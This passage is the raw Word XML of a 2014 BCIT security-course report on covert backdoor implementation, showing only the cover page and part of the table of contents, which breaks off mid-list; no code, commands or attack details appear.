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C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Understanding Covert Backdoor Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Cole Rees - A00741578</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>David Tran - A00801942</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>COMP 8505 Set 7D</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>British Columbia Institute of Technology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Aman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Abdulla</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Monday, December 8 2014</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:bookmarkStart w:id="0" w:name="h.dp9mkn79v6bt" w:colFirst="0" w:colLast="0" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="0" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="2116548976"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="007255E2" w:rsidRPr="007255E2" w:rsidRDefault="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="42"/>
              <w:szCs w:val="42"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="007255E2">
            <w:rPr>
              <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="42"/>
              <w:szCs w:val="42"/>
            </w:rPr>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRPr="007255E2" w:rsidRDefault="007255E2" w:rsidP="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
          </w:pPr>
          <w:r w:rsidRPr="007255E2">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="007255E2">
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="007255E2">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc405739253" w:history="1">
            <w:r w:rsidRPr="007255E2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r w:rsidRPr="007255E2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007255E2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="007255E2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739253 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="007255E2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="007255E2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="007255E2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739254" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Building on our Proof of Concept</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739254 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRPr="007255E2" w:rsidRDefault="007255E2" w:rsidP="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739255" w:history="1">
            <w:r w:rsidRPr="007255E2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>High-Level Design Work</w:t>
            </w:r>
            <w:r w:rsidRPr="007255E2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007255E2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="007255E2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739255 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="007255E2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="007255E2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="007255E2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739256" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>High Level Diagram</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739256 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739257" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Logical Diagram</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739257 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739258" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Pseudo Code</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739258 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739259" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>State Chart Diagrams</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739259 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2" w:rsidP="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739264" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Scheduled Timeline, Tasks &amp; Milestones</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739264 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2" w:rsidP="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739265" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Tools &amp; Equipment</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739265 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2" w:rsidP="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739268" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Testing, Evidence &amp; Observations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739268 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739269" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Names &amp; Aliases</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739269 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739270" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Test Cases</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739270 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739271" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Evidence &amp; Observations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739271 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739272" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Programs do not have any memory leaks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739272 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc405739273" w:history="1">
            <w:r w:rsidRPr="00E37892">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Programs are not intensive for machines to run</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc405739273 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DC7715">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="007255E2" w:rsidRDefault="007255E2">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
